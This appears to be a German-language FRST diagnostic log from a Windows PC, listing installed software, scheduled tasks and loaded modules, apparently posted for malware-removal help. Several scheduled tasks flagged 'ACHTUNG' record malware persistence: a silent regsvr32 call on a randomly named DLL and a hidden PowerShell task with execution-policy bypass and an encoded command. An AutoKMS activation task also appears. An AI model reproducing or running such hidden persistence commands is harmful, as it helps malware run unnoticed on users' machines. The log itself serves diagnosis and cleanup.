(Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) 
Hidden Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive) CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World) Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.) Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version: - ) ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen) EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc) Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version: - Ubisoft) Ghostery (HKLM-x32\...\Ghostery) (Version: - Ghostery Inc) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.) Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation) JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH) Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - 
Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft) Mozilla 
Firefox 53.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.2 (x86 de)) (Version: 53.0.2 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.2.6333 - Mozilla) Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.) Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek) Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.) Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.) Sacred 3 (HKLM-x32\...\Steam App 247950) (Version: - Keen Games) Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics) Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.) Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung) SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts) Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.) 
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Hidden
Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version: - Ubisoft)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft)
Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH)
WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEABCBF8-4763-43D1-883B-86C80CB16A79} - System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (Der Dateneintrag hat 9732 mehr Zeichen). <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl
2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe
2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 43195904 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 02457088 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\skypert.dll
2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files (x86)\Drakonia Configurator\hid.exe
2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui
2017-05-07 17:13 - 2017-05-21 20:55 - 00034448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll
2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll
2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll
2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll
2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll
2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll
2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll
2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

